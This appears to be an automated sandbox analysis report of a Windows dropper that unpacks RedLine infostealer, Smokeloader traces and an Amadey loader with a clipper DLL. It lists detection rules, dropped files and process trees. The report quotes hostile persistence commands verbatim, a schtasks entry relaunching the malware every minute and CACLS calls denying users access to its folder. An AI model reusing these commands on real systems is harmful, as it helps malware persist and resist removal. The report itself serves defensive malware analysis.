                              Source: 2.2.aPsf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: 2.2.aPsf.exe.660e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: 00000002.00000002.292364966.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                              Source: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: 00000002.00000002.292530050.00000000006F7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                              Source: 00000002.00000003.267977277.0000000000690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D3BA20_2_003D3BA2
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D5C9E0_2_003D5C9E
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeCode function: 1_2_00F33BA21_2_00F33BA2
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeCode function: 1_2_00F35C9E1_2_00F35C9E
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_00408C602_2_00408C60
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_0040DC112_2_0040DC11
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_00407C3F2_2_00407C3F
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_00418CCC2_2_00418CCC
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_00406CA02_2_00406CA0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_004028B02_2_004028B0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_0041A4BE2_2_0041A4BE
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_004182442_2_00418244
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_004016502_2_00401650
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_00402F202_2_00402F20
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_004193C42_2_004193C4
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_004187882_2_00418788
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_00402F892_2_00402F89
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_00402B902_2_00402B90
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_004073A02_2_004073A0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_02520DB02_2_02520DB0
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_0122853014_2_01228530
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_0122754D14_2_0122754D
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_01206F4014_2_01206F40
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dll B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: 2.3.aPsf.exe.690000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: 2.2.aPsf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: 2.2.aPsf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: 2.2.aPsf.exe.660e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: 00000002.00000002.292364966.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                              Source: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: 00000002.00000002.292530050.00000000006F7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                              Source: 00000002.00000003.267977277.0000000000690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: Process Memory Space: mnolyk.exe PID: 5764, type: MEMORYSTRMatched rule: webshell_php_encoded_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using some kind of eval with encoded blob to decode, score = 1d4b374d284c12db881ba42ee63ebce2759e0b14, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_003D1F90
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeCode function: 1_2_00F31F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00F31F90
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: String function: 01215E20 appears 130 times
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: String function: 01217CE0 appears 40 times
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: String function: 0040E1D8 appears 44 times
                              Source: file.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 381698 bytes, 2 files, at 0x2c +A "bPsg.exe" +A "xriv.exe", ID 1589, number 1, 18 datablocks, 0x1503 compression
                              Source: bPsg.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 190378 bytes, 2 files, at 0x2c +A "aPsf.exe" +A "nika.exe", ID 1549, number 1, 9 datablocks, 0x1503 compression
                              Source: file.exe, 00000000.00000003.254673704.0000000004709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                              Source: file.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                              Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aPsf.exe.log
                              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@37/14@0/1
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeFile read: C:\Users\user\Desktop\desktop.ini
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_003D597D
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeCode function: 7_2_00007FFDC87B1B10 ChangeServiceConfigA,7_2_00007FFDC87B1B10
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D4FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_003D4FE0
                              Source: file.exeReversingLabs: Detection: 65%
                              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                              Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\bPsg.exe
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exe C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\aPsf.exe
                              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\nika.exe
                              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exe
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6088:120:WilError_01
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeMutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6044:120:WilError_01
                              Source: C:\Users\user\Desktop\file.exeCommand line argument: Kernel32.dll0_2_003D2BFB
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeCommand line argument: Kernel32.dll1_2_00F32BFB
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCommand line argument: 08A2_2_00413780
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                              Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                              Source: Binary string: wextract.pdb source: file.exe, bPsg.exe.0.dr
                              Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.254759313.0000000002B4D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.254673704.0000000004709000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp, xriv.exe, 0000000E.00000000.319981682.000000000122E000.00000002.00000001.01000000.00000009.sdmp, mnolyk.exe, 0000000F.00000000.321061276.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000000F.00000002.776375932.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000017.00000000.324442770.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000017.00000002.331617769.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001E.00000000.454992434.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001E.00000002.455530364.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000020.00000000.583556891.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000020.00000002.583854303.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000021.00000002.713071373.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000021.00000000.712358400.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe.14.dr, xriv.exe.0.dr
                              Source: Binary string: Healer.pdb source: aPsf.exe, 00000002.00000002.293044545.0000000002430000.00000004.08000000.00040000.00000000.sdmp, aPsf.exe, 00000002.00000002.293843993.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, aPsf.exe, 00000002.00000002.293157331.0000000002651000.00000004.00000800.00020000.00000000.sdmp, aPsf.exe, 00000002.00000002.292800577.0000000002040000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: wextract.pdbGCTL source: file.exe, bPsg.exe.0.dr
                              Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: bPsg.exe, 00000001.00000003.255402987.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, bPsg.exe, 00000001.00000003.255338525.0000000004723000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 00000007.00000000.294247979.0000000000D42000.00000002.00000001.01000000.00000008.sdmp, nika.exe.1.dr
                              Source: Binary string: _.pdb source: aPsf.exe, 00000002.00000002.293044545.0000000002430000.00000004.08000000.00040000.00000000.sdmp, aPsf.exe, 00000002.00000002.293157331.0000000002651000.00000004.00000800.00020000.00000000.sdmp, aPsf.exe, 00000002.00000002.292800577.0000000002040000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\yoxici.pdb source: bPsg.exe, 00000001.00000003.255338525.00000000046E6000.00000004.00000020.00020000.00000000.sdmp, aPsf.exe, 00000002.00000000.255496089.0000000000401000.00000020.00000001.01000000.00000005.sdmp, aPsf.exe.1.dr
                              Source: Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: mnolyk.exe, 0000000F.00000002.776777410.0000000000FC1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001A.00000002.776435922.000000006EC2F000.00000002.00000001.01000000.0000000C.sdmp, clip64[1].dll.15.dr, clip64.dll.15.dr
                              Source: Binary string: Healer.pdbH5 source: aPsf.exe, 00000002.00000002.293044545.0000000002430000.00000004.08000000.00040000.00000000.sdmp, aPsf.exe, 00000002.00000002.293843993.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, aPsf.exe, 00000002.00000002.293157331.0000000002651000.00000004.00000800.00020000.00000000.sdmp, aPsf.exe, 00000002.00000002.292800577.0000000002040000.00000004.00000020.00020000.00000000.sdmp

                              Data Obfuscation

                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeUnpacked PE file: 2.2.aPsf.exe.400000.0.unpack
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeUnpacked PE file: 2.2.aPsf.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D724D push ecx; ret 0_2_003D7260
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeCode function: 1_2_00F3724D push ecx; ret 1_2_00F37260
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_0041C40C push cs; iretd 2_2_0041C4E2
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_00423149 push eax; ret 2_2_00423179
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_0041C50E push cs; iretd 2_2_0041C4E2
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_004231C8 push eax; ret 2_2_00423179
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_0040E21D push ecx; ret 2_2_0040E230
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_0041C6BE push ebx; ret 2_2_0041C6BF
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_0252454E push ecx; retf 2_2_02524554
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_02524139 push edi; iretd 2_2_0252414E
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_0120F748 push E8FFFFFBh; iretd 14_2_0120F74D
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_01217D26 push ecx; ret 14_2_01217D39
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_003D202A
                              Source: nika.exe.1.drStatic PE information: 0xE382D401 [Fri Dec 15 06:19:45 2090 UTC]

                              Persistence and Installation Behavior

                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.776777410.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: mnolyk.exe PID: 6136, type: MEMORYSTR
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exe
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dll
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeFile created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeFile created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exe
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_003D1AE8
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeCode function: 1_2_00F31AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_00F31AE8

                              Boot Survival

                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exe TID: 1556Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe TID: 4444Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 6140Thread sleep count: 64 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 6140Thread sleep time: -1920000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 3024Thread sleep time: -50000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 4648Thread sleep count: 34 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 4648Thread sleep time: -6120000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 3184Thread sleep count: 47 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 6140Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exe TID: 1340Thread sleep count: 200 > 30Jump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exe TID: 1340Thread sleep time: -200000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
